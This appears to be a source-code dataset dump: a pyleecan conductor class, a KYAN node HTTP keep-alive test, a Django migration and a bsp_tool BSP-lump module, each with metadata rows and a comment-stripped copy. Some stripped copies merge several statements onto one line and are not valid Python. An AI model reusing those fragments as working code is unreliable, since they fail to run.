self._Nwppc = value
Nwppc = property(
fget=_get_Nwppc,
fset=_set_Nwppc,
doc=u"""cf schematics, winding number of random wires (strands) in parallel per coil
:Type: int
:min: 1
""",
)
def _get_Wins_wire(self):
"""getter of Wins_wire"""
return self._Wins_wire
def _set_Wins_wire(self, value):
"""setter of Wins_wire"""
check_var("Wins_wire", value, "float", Vmin=0)
self._Wins_wire = value
Wins_wire = property(
fget=_get_Wins_wire,
fset=_set_Wins_wire,
doc=u"""(advanced) cf schematics, winding strand insulation thickness [m]
:Type: float
:min: 0
""",
)
def _get_Kwoh(self):
"""getter of Kwoh"""
return self._Kwoh
def _set_Kwoh(self, value):
"""setter of Kwoh"""
check_var("Kwoh", value, "float", Vmin=0)
self._Kwoh = value
Kwoh = property(
fget=_get_Kwoh,
fset=_set_Kwoh,
doc=u"""winding overhang factor which describes the fact that random round wire end-windings can be more or less compressed (0.5 for small motors, 0.8 for large motors) - can be used to tune the average turn length (relevant if type_cond==1)
:Type: float
:min: 0
""",
)
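# Example usage (an illustrative sketch, not generated code; the values are
# hypothetical and cond_mat/ins_mat stay at -1 to get default Materials):
#     >>> cond = CondType12(Wwire=0.5e-3, Nwppc=20, Kwoh=0.6)
#     >>> Sact = cond.comp_surface_active()  # copper section of all strands [m^2]
#     >>> d = cond.as_dict()  # round-trip with CondType12(init_dict=d)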
| 32.125341 | 249 | 0.609669 |
from os import linesep
from sys import getsizeof
from logging import getLogger
from ._check import check_var, raise_
from ..Functions.get_logger import get_logger
from ..Functions.save import save
from ..Functions.copy import copy
from ..Functions.load import load_init_dict
from ..Functions.Load.import_class import import_class
from .Conductor import Conductor
try:
from ..Methods.Machine.CondType12.check import check
except ImportError as error:
check = error
try:
from ..Methods.Machine.CondType12.comp_surface_active import comp_surface_active
except ImportError as error:
comp_surface_active = error
try:
from ..Methods.Machine.CondType12.comp_height import comp_height
except ImportError as error:
comp_height = error
try:
from ..Methods.Machine.CondType12.comp_surface import comp_surface
except ImportError as error:
comp_surface = error
try:
from ..Methods.Machine.CondType12.comp_width import comp_width
except ImportError as error:
comp_width = error
try:
from ..Methods.Machine.CondType12.plot import plot
except ImportError as error:
plot = error
try:
from ..Methods.Machine.CondType12.plot_schematics import plot_schematics
except ImportError as error:
plot_schematics = error
from ._check import InitUnKnowClassError
from .Material import Material
class CondType12(Conductor):
VERSION = 1
if isinstance(check, ImportError):
check = property(
fget=lambda x: raise_(
ImportError("Can't use CondType12 method check: " + str(check))
)
)
else:
check = check
# cf Methods.Machine.CondType12.comp_surface_active
if isinstance(comp_surface_active, ImportError):
comp_surface_active = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_surface_active: "
+ str(comp_surface_active)
)
)
)
else:
comp_surface_active = comp_surface_active
if isinstance(comp_height, ImportError):
comp_height = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_height: " + str(comp_height)
)
)
)
else:
comp_height = comp_height
# cf Methods.Machine.CondType12.comp_surface
if isinstance(comp_surface, ImportError):
comp_surface = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_surface: " + str(comp_surface)
)
)
)
else:
comp_surface = comp_surface
if isinstance(comp_width, ImportError):
comp_width = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_width: " + str(comp_width)
)
)
)
else:
comp_width = comp_width
# cf Methods.Machine.CondType12.plot
if isinstance(plot, ImportError):
plot = property(
fget=lambda x: raise_(
ImportError("Can't use CondType12 method plot: " + str(plot))
)
)
else:
plot = plot
if isinstance(plot_schematics, ImportError):
plot_schematics = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method plot_schematics: "
+ str(plot_schematics)
)
)
)
else:
plot_schematics = plot_schematics
# save and copy methods are available in all object
save = save
copy = copy
# get_logger method is available in all object
get_logger = get_logger
def __init__(
self,
Wwire=0.015,
Wins_cond=0.015,
Nwppc=1,
Wins_wire=0,
Kwoh=0.5,
cond_mat=-1,
ins_mat=-1,
init_dict=None,
init_str=None,
):
if init_str is not None: # Load from a file
init_dict = load_init_dict(init_str)[1]
if init_dict is not None: # Initialisation by dict
assert type(init_dict) is dict
# Overwrite default value with init_dict content
if "Wwire" in list(init_dict.keys()):
Wwire = init_dict["Wwire"]
if "Wins_cond" in list(init_dict.keys()):
Wins_cond = init_dict["Wins_cond"]
if "Nwppc" in list(init_dict.keys()):
Nwppc = init_dict["Nwppc"]
if "Wins_wire" in list(init_dict.keys()):
Wins_wire = init_dict["Wins_wire"]
if "Kwoh" in list(init_dict.keys()):
Kwoh = init_dict["Kwoh"]
if "cond_mat" in list(init_dict.keys()):
cond_mat = init_dict["cond_mat"]
if "ins_mat" in list(init_dict.keys()):
ins_mat = init_dict["ins_mat"]
# Set the properties (value check and convertion are done in setter)
self.Wwire = Wwire
self.Wins_cond = Wins_cond
self.Nwppc = Nwppc
self.Wins_wire = Wins_wire
self.Kwoh = Kwoh
# Call Conductor init
super(CondType12, self).__init__(cond_mat=cond_mat, ins_mat=ins_mat)
        # The class is frozen (in Conductor init), for now it's impossible to add new properties
def __str__(self):
CondType12_str = ""
CondType12_str += super(CondType12, self).__str__()
CondType12_str += "Wwire = " + str(self.Wwire) + linesep
CondType12_str += "Wins_cond = " + str(self.Wins_cond) + linesep
CondType12_str += "Nwppc = " + str(self.Nwppc) + linesep
CondType12_str += "Wins_wire = " + str(self.Wins_wire) + linesep
CondType12_str += "Kwoh = " + str(self.Kwoh) + linesep
return CondType12_str
def __eq__(self, other):
if type(other) != type(self):
return False
if not super(CondType12, self).__eq__(other):
return False
if other.Wwire != self.Wwire:
return False
if other.Wins_cond != self.Wins_cond:
return False
if other.Nwppc != self.Nwppc:
return False
if other.Wins_wire != self.Wins_wire:
return False
if other.Kwoh != self.Kwoh:
return False
return True
def __sizeof__(self):
S = 0
S += super(CondType12, self).__sizeof__()
S += getsizeof(self.Wwire)
S += getsizeof(self.Wins_cond)
S += getsizeof(self.Nwppc)
S += getsizeof(self.Wins_wire)
S += getsizeof(self.Kwoh)
return S
def as_dict(self):
CondType12_dict = super(CondType12, self).as_dict()
CondType12_dict["Wwire"] = self.Wwire
CondType12_dict["Wins_cond"] = self.Wins_cond
CondType12_dict["Nwppc"] = self.Nwppc
CondType12_dict["Wins_wire"] = self.Wins_wire
CondType12_dict["Kwoh"] = self.Kwoh
CondType12_dict["__class__"] = "CondType12"
return CondType12_dict
def _set_None(self):
self.Wwire = None
self.Wins_cond = None
self.Nwppc = None
self.Wins_wire = None
self.Kwoh = None
super(CondType12, self)._set_None()
def _get_Wwire(self):
return self._Wwire
def _set_Wwire(self, value):
check_var("Wwire", value, "float", Vmin=0)
self._Wwire = value
Wwire = property(
fget=_get_Wwire,
fset=_set_Wwire,
doc=u"""cf schematics, single wire diameter without insulation [m]
:Type: float
:min: 0
""",
)
def _get_Wins_cond(self):
return self._Wins_cond
def _set_Wins_cond(self, value):
check_var("Wins_cond", value, "float", Vmin=0)
self._Wins_cond = value
Wins_cond = property(
fget=_get_Wins_cond,
fset=_set_Wins_cond,
doc=u"""(advanced) cf schematics, winding coil insulation diameter [m]
:Type: float
:min: 0
""",
)
def _get_Nwppc(self):
return self._Nwppc
def _set_Nwppc(self, value):
check_var("Nwppc", value, "int", Vmin=1)
self._Nwppc = value
Nwppc = property(
fget=_get_Nwppc,
fset=_set_Nwppc,
doc=u"""cf schematics, winding number of random wires (strands) in parallel per coil
:Type: int
:min: 1
""",
)
def _get_Wins_wire(self):
return self._Wins_wire
def _set_Wins_wire(self, value):
check_var("Wins_wire", value, "float", Vmin=0)
self._Wins_wire = value
Wins_wire = property(
fget=_get_Wins_wire,
fset=_set_Wins_wire,
doc=u"""(advanced) cf schematics, winding strand insulation thickness [m]
:Type: float
:min: 0
""",
)
def _get_Kwoh(self):
return self._Kwoh
def _set_Kwoh(self, value):
check_var("Kwoh", value, "float", Vmin=0)
self._Kwoh = value
Kwoh = property(
fget=_get_Kwoh,
fset=_set_Kwoh,
doc=u"""winding overhang factor which describes the fact that random round wire end-windings can be more or less compressed (0.5 for small motors, 0.8 for large motors) - can be used to tune the average turn length (relevant if type_cond==1)
:Type: float
:min: 0
""",
)
| true | true |
1c4a704defde2f07302fed79149db9bb0af194e7 | 4,779 | py | Python | test/functional/interface_http.py | kyancoin/KYAN | 39174bd5add8a41a82ca53e5f1372e4c0a58f447 | [
"MIT"
] | 6 | 2020-09-17T04:29:33.000Z | 2021-08-08T16:39:10.000Z | test/functional/interface_http.py | sapphire-pt/KYAN | 0c534d9a10a8d07d3707c74e6ea93477857b5ec7 | [
"MIT"
] | 22 | 2020-07-31T20:01:16.000Z | 2020-08-13T09:58:21.000Z | test/functional/interface_http.py | kyancoin/KYAN | 39174bd5add8a41a82ca53e5f1372e4c0a58f447 | [
"MIT"
] | 4 | 2020-09-17T22:32:25.000Z | 2022-01-12T20:49:24.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import PivxTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (PivxTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
        #the same should happen if we explicitly add keep-alive, since that is the standard behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
        assert(conn.sock!=None) #connection must still be open because kyanited should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| 43.844037 | 108 | 0.632768 |
from test_framework.test_framework import PivxTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (PivxTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None)
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) assert(conn.sock!=None) conn.close()
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None)
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) assert(conn.sock!=None) conn.close()
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None)
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| true | true |
1c4a70cf289dd3128b34f541efdf029286cbd0d2 | 1,070 | py | Python | data/migrations/0012_auto_20191005_0731.py | SIXMON/peps | 48c09a951a0193ada7b91c8bb6efc4b1232c3520 | [
"MIT"
] | 5 | 2019-08-29T13:55:47.000Z | 2021-11-15T08:30:33.000Z | data/migrations/0012_auto_20191005_0731.py | SIXMON/peps | 48c09a951a0193ada7b91c8bb6efc4b1232c3520 | [
"MIT"
] | 295 | 2019-08-19T12:40:29.000Z | 2022-01-24T14:03:20.000Z | data/migrations/0012_auto_20191005_0731.py | SIXMON/peps | 48c09a951a0193ada7b91c8bb6efc4b1232c3520 | [
"MIT"
] | 7 | 2020-05-27T06:28:48.000Z | 2021-11-17T10:00:54.000Z | # Generated by Django 2.2.4 on 2019-10-05 07:31
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('data', '0011_auto_20191004_1505'),
]
operations = [
migrations.RemoveField(
model_name='practice',
name='pest_multipliers',
),
migrations.AddField(
model_name='practice',
name='pest_multipliers',
field=django.contrib.postgres.fields.ArrayField(base_field=django.contrib.postgres.fields.jsonb.JSONField(), blank=True, null=True, size=None),
),
migrations.RemoveField(
model_name='practice',
name='weed_multipliers',
),
migrations.AddField(
model_name='practice',
name='weed_multipliers',
field=django.contrib.postgres.fields.ArrayField(base_field=django.contrib.postgres.fields.jsonb.JSONField(), blank=True, null=True, size=None),
),
]
| 31.470588 | 155 | 0.636449 |
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('data', '0011_auto_20191004_1505'),
]
operations = [
migrations.RemoveField(
model_name='practice',
name='pest_multipliers',
),
migrations.AddField(
model_name='practice',
name='pest_multipliers',
field=django.contrib.postgres.fields.ArrayField(base_field=django.contrib.postgres.fields.jsonb.JSONField(), blank=True, null=True, size=None),
),
migrations.RemoveField(
model_name='practice',
name='weed_multipliers',
),
migrations.AddField(
model_name='practice',
name='weed_multipliers',
field=django.contrib.postgres.fields.ArrayField(base_field=django.contrib.postgres.fields.jsonb.JSONField(), blank=True, null=True, size=None),
),
]
| true | true |
1c4a70d44d91648b29f794c7eba76c2e8bd1c7fa | 7,104 | py | Python | bsp_tool/branches/valve/orange_box.py | snake-biscuits/bsp_tool | f2a1ab3ff502d0ca4ade97ff6e44823d2f8f5773 | [
"MIT"
] | 44 | 2018-07-06T04:44:02.000Z | 2022-03-27T02:18:37.000Z | bsp_tool/branches/valve/orange_box.py | snake-biscuits/bsp_tool | f2a1ab3ff502d0ca4ade97ff6e44823d2f8f5773 | [
"MIT"
] | 18 | 2018-07-25T23:19:17.000Z | 2022-03-16T23:59:36.000Z | bsp_tool/branches/valve/orange_box.py | snake-biscuits/bsp_tool | f2a1ab3ff502d0ca4ade97ff6e44823d2f8f5773 | [
"MIT"
] | 12 | 2019-09-13T21:52:51.000Z | 2022-03-22T18:04:21.000Z | # https://github.com/ValveSoftware/source-sdk-2013/blob/master/sp/src/public/bspfile.h
import enum
import io
import struct
from typing import List
from .. import base
from . import source
FILE_MAGIC = b"VBSP"
BSP_VERSION = 20 # NOTE: v20 Source BSPs differ widely, since many forks are of this version
GAME_PATHS = ["Day of Defeat: Source", # TODO: full path
"G String",
"Garry's Mod",
"Half-Life 2: Episode 2",
"Half-Life 2 Update",
"NEOTOKYO",
"Portal",
"Team Fortress 2"]
GAME_VERSIONS = {GAME: BSP_VERSION for GAME in GAME_PATHS}
class LUMP(enum.Enum):
ENTITIES = 0
PLANES = 1
TEXTURE_DATA = 2
VERTICES = 3
VISIBILITY = 4
NODES = 5
TEXTURE_INFO = 6
FACES = 7 # version 1
LIGHTING = 8 # version 1
OCCLUSION = 9 # version 2
LEAVES = 10 # version 1
FACE_IDS = 11 # TF2 branch, for mapping debug & detail prop seed
EDGES = 12
SURFEDGES = 13
MODELS = 14
WORLD_LIGHTS = 15
LEAF_FACES = 16
LEAF_BRUSHES = 17
BRUSHES = 18
BRUSH_SIDES = 19
AREAS = 20
AREA_PORTALS = 21
UNUSED_22 = 22
UNUSED_23 = 23
UNUSED_24 = 24
UNUSED_25 = 25
DISPLACEMENT_INFO = 26
ORIGINAL_FACES = 27
PHYSICS_DISPLACEMENT = 28
PHYSICS_COLLIDE = 29
VERTEX_NORMALS = 30
VERTEX_NORMAL_INDICES = 31
DISPLACEMENT_LIGHTMAP_ALPHAS = 32 # deprecated / X360 ?
DISPLACEMENT_VERTICES = 33
DISPLACEMENT_LIGHTMAP_SAMPLE_POSITIONS = 34
GAME_LUMP = 35
LEAF_WATER_DATA = 36
PRIMITIVES = 37
PRIMITIVE_VERTICES = 38 # deprecated / X360 ?
PRIMITIVE_INDICES = 39
PAKFILE = 40
CLIP_PORTAL_VERTICES = 41
CUBEMAPS = 42
TEXTURE_DATA_STRING_DATA = 43
TEXTURE_DATA_STRING_TABLE = 44
OVERLAYS = 45
LEAF_MIN_DIST_TO_WATER = 46
FACE_MACRO_TEXTURE_INFO = 47
DISPLACEMENT_TRIS = 48
PHYSICS_COLLIDE_SURFACE = 49 # deprecated / X360 ?
WATER_OVERLAYS = 50 # deprecated / X360 ?
LEAF_AMBIENT_INDEX_HDR = 51
LEAF_AMBIENT_INDEX = 52
LIGHTING_HDR = 53 # version 1
WORLD_LIGHTS_HDR = 54
LEAF_AMBIENT_LIGHTING_HDR = 55 # version 1
LEAF_AMBIENT_LIGHTING = 56 # version 1
XZIP_PAKFILE = 57 # deprecated / X360 ?
FACES_HDR = 58 # version 1
MAP_FLAGS = 59
OVERLAY_FADES = 60
UNUSED_61 = 61
UNUSED_62 = 62
UNUSED_63 = 63
# struct SourceBspHeader { char file_magic[4]; int version; SourceLumpHeader headers[64]; int revision; };
lump_header_address = {LUMP_ID: (8 + i * 16) for i, LUMP_ID in enumerate(LUMP)}
def read_lump_header(file, LUMP: enum.Enum) -> source.SourceLumpHeader:
file.seek(lump_header_address[LUMP])
offset, length, version, fourCC = struct.unpack("4I", file.read(16))
header = source.SourceLumpHeader(offset, length, version, fourCC)
return header
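# e.g. grabbing one lump by hand (illustrative sketch; the map path is hypothetical):
#   with open("maps/example.bsp", "rb") as bsp_file:
#       entity_header = read_lump_header(bsp_file, LUMP.ENTITIES)  # headers start at offset 8
#       bsp_file.seek(entity_header.offset)
#       raw_entities = bsp_file.read(entity_header.length)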
# a rough map of the relationships between lumps:
#
# /-> SurfEdge -> Edge -> Vertex
# Leaf -> Node -> Face -> Plane
# \-> DisplacementInfo -> DisplacementVertex
#
# ClipPortalVertices are AreaPortal geometry [citation needed]
# classes for each lump, in alphabetical order:
class Leaf(base.Struct): # LUMP 10
"""Endpoint of a vis tree branch, a pocket of Faces"""
contents: int # contents bitflags
cluster: int # index of this Leaf's cluster (parent node?) (visibility?)
area_flags: int # area + flags (short area:9; short flags:7;)
# area and flags are held in the same float
# area = leaf[2] & 0xFF80 >> 7 # 9 bits
# flags = leaf[2] & 0x007F # 7 bits
# TODO: automatically split area & flags, merging back for flat()
# why was this done when the struct is padded by one short anyway?
mins: List[float] # bounding box minimums along XYZ axes
maxs: List[float] # bounding box maximums along XYZ axes
first_leaf_face: int # index of first LeafFace
num_leaf_faces: int # number of LeafFaces
first_leaf_brush: int # index of first LeafBrush
num_leaf_brushes: int # number of LeafBrushes
leaf_water_data_id: int # -1 if this leaf isn't submerged
padding: int # should be empty
__slots__ = ["contents", "cluster", "area_flags", "mins", "maxs",
"first_leaf_face", "num_leaf_faces", "first_leaf_brush",
"num_leaf_brushes", "leaf_water_data_id", "padding"]
_format = "i8h4H2h"
_arrays = {"mins": [*"xyz"], "maxs": [*"xyz"]}
# classes for special lumps, in alphabetical order:
class PhysicsDisplacement(list): # LUMP 28
def __init__(self, raw_lump: bytes):
lump = io.BytesIO(raw_lump)
count = int.from_bytes(lump.read(2), "little")
        data_sizes = list(struct.unpack(f"{count}H", lump.read(count * 2)))
physics_data = list()
for size in data_sizes:
physics_data.append(lump.read(size))
super().__init__(physics_data)
def as_bytes(self) -> bytes:
count = len(self).to_bytes(2, "little")
sizes = map(lambda s: s.to_bytes(2, "little"), [len(d) for d in self])
return b"".join(count, *sizes, *self)
class StaticPropv10(base.Struct): # sprp GAME LUMP (LUMP 35)
origin: List[float] # origin.xyz
angles: List[float] # origin.yzx QAngle; Z0 = East
    name_index: int  # index into GAME_LUMP.sprp.model_names
first_leaf: int # index into Leaf lump
num_leafs: int # number of Leafs after first_leaf this StaticPropv10 is in
solid_mode: int # collision flags enum
skin: int # index of this StaticProp's skin in the .mdl
fade_distance: List[float] # min & max distances to fade out
lighting_origin: List[float] # xyz position to sample lighting from
forced_fade_scale: float # relative to pixels used to render on-screen?
dx_level: List[int] # supported directX level, will not render depending on settings
flags: int # other flags
lightmap: List[int] # dimensions of this StaticProp's lightmap (GAME_LUMP.static prop lighting?)
__slots__ = ["origin", "angles", "name_index", "first_leaf", "num_leafs",
"solid_mode", "skin", "fade_distance", "lighting_origin",
"forced_fade_scale", "dx_level", "flags", "lightmap"]
_format = "6f3HBi6f2Hi2H"
_arrays = {"origin": [*"xyz"], "angles": [*"yzx"], "fade_distance": ["min", "max"],
"lighting_origin": [*"xyz"], "dx_level": ["min", "max"],
"lightmap": ["width", "height"]}
# {"LUMP_NAME": {version: LumpClass}}
BASIC_LUMP_CLASSES = source.BASIC_LUMP_CLASSES.copy()
LUMP_CLASSES = source.LUMP_CLASSES.copy()
LUMP_CLASSES.update({"LEAVES": {1: Leaf}})
SPECIAL_LUMP_CLASSES = source.SPECIAL_LUMP_CLASSES.copy()
GAME_LUMP_HEADER = source.GAME_LUMP_HEADER
# {"lump": {version: SpecialLumpClass}}
GAME_LUMP_CLASSES = source.GAME_LUMP_CLASSES.copy()
GAME_LUMP_CLASSES["sprp"].update({7: lambda raw_lump: source.GameLump_SPRP(raw_lump, StaticPropv10), # 7*
10: lambda raw_lump: source.GameLump_SPRP(raw_lump, StaticPropv10)})
methods = [*source.methods]
| 36.060914 | 106 | 0.657517 | import enum
import io
import struct
from typing import List
from .. import base
from . import source
FILE_MAGIC = b"VBSP"
BSP_VERSION = 20
GAME_PATHS = ["Day of Defeat: Source", "G String",
"Garry's Mod",
"Half-Life 2: Episode 2",
"Half-Life 2 Update",
"NEOTOKYO",
"Portal",
"Team Fortress 2"]
GAME_VERSIONS = {GAME: BSP_VERSION for GAME in GAME_PATHS}
class LUMP(enum.Enum):
ENTITIES = 0
PLANES = 1
TEXTURE_DATA = 2
VERTICES = 3
VISIBILITY = 4
NODES = 5
TEXTURE_INFO = 6
FACES = 7 # version 1
LIGHTING = 8 # version 1
OCCLUSION = 9 # version 2
LEAVES = 10 # version 1
FACE_IDS = 11 # TF2 branch, for mapping debug & detail prop seed
EDGES = 12
SURFEDGES = 13
MODELS = 14
WORLD_LIGHTS = 15
LEAF_FACES = 16
LEAF_BRUSHES = 17
BRUSHES = 18
BRUSH_SIDES = 19
AREAS = 20
AREA_PORTALS = 21
UNUSED_22 = 22
UNUSED_23 = 23
UNUSED_24 = 24
UNUSED_25 = 25
DISPLACEMENT_INFO = 26
ORIGINAL_FACES = 27
PHYSICS_DISPLACEMENT = 28
PHYSICS_COLLIDE = 29
VERTEX_NORMALS = 30
VERTEX_NORMAL_INDICES = 31
DISPLACEMENT_LIGHTMAP_ALPHAS = 32 # deprecated / X360 ?
DISPLACEMENT_VERTICES = 33
DISPLACEMENT_LIGHTMAP_SAMPLE_POSITIONS = 34
GAME_LUMP = 35
LEAF_WATER_DATA = 36
PRIMITIVES = 37
PRIMITIVE_VERTICES = 38 # deprecated / X360 ?
PRIMITIVE_INDICES = 39
PAKFILE = 40
CLIP_PORTAL_VERTICES = 41
CUBEMAPS = 42
TEXTURE_DATA_STRING_DATA = 43
TEXTURE_DATA_STRING_TABLE = 44
OVERLAYS = 45
LEAF_MIN_DIST_TO_WATER = 46
FACE_MACRO_TEXTURE_INFO = 47
DISPLACEMENT_TRIS = 48
PHYSICS_COLLIDE_SURFACE = 49 # deprecated / X360 ?
WATER_OVERLAYS = 50 # deprecated / X360 ?
LEAF_AMBIENT_INDEX_HDR = 51
LEAF_AMBIENT_INDEX = 52
LIGHTING_HDR = 53 # version 1
WORLD_LIGHTS_HDR = 54
LEAF_AMBIENT_LIGHTING_HDR = 55 # version 1
LEAF_AMBIENT_LIGHTING = 56 # version 1
XZIP_PAKFILE = 57 # deprecated / X360 ?
FACES_HDR = 58 # version 1
MAP_FLAGS = 59
OVERLAY_FADES = 60
UNUSED_61 = 61
UNUSED_62 = 62
UNUSED_63 = 63
# struct SourceBspHeader { char file_magic[4]; int version; SourceLumpHeader headers[64]; int revision; };
lump_header_address = {LUMP_ID: (8 + i * 16) for i, LUMP_ID in enumerate(LUMP)}
def read_lump_header(file, LUMP: enum.Enum) -> source.SourceLumpHeader:
file.seek(lump_header_address[LUMP])
offset, length, version, fourCC = struct.unpack("4I", file.read(16))
header = source.SourceLumpHeader(offset, length, version, fourCC)
return header
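# Illustrative usage sketch (not from the original file); `bsp_file` is a
# hypothetical file object opened in binary mode on a version 20 .bsp:
# >>> ent_header = read_lump_header(bsp_file, LUMP.ENTITIES)
# >>> ent_header.length  # size of the entities lump in bytes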
# a rough map of the relationships between lumps:
#
# /-> SurfEdge -> Edge -> Vertex
# Leaf -> Node -> Face -> Plane
# \-> DisplacementInfo -> DisplacementVertex
#
# ClipPortalVertices are AreaPortal geometry [citation needed]
# classes for each lump, in alphabetical order:
class Leaf(base.Struct): # LUMP 10
contents: int # contents bitflags
cluster: int # index of this Leaf's cluster (parent node?) (visibility?)
    area_flags: int
    mins: List[float]
    maxs: List[float]
    first_leaf_face: int
    num_leaf_faces: int
    first_leaf_brush: int
    num_leaf_brushes: int
    leaf_water_data_id: int
    padding: int  # should be empty
__slots__ = ["contents", "cluster", "area_flags", "mins", "maxs",
"first_leaf_face", "num_leaf_faces", "first_leaf_brush",
"num_leaf_brushes", "leaf_water_data_id", "padding"]
_format = "i8h4H2h"
_arrays = {"mins": [*"xyz"], "maxs": [*"xyz"]}
# classes for special lumps, in alphabetical order:
class PhysicsDisplacement(list): # LUMP 28
def __init__(self, raw_lump: bytes):
lump = io.BytesIO(raw_lump)
count = int.from_bytes(lump.read(2), "little")
        data_sizes = list(struct.unpack(f"{count}H", lump.read(count * 2)))
physics_data = list()
for size in data_sizes:
physics_data.append(lump.read(size))
super().__init__(physics_data)
def as_bytes(self) -> bytes:
count = len(self).to_bytes(2, "little")
sizes = map(lambda s: s.to_bytes(2, "little"), [len(d) for d in self])
        return b"".join([count, *sizes, *self])
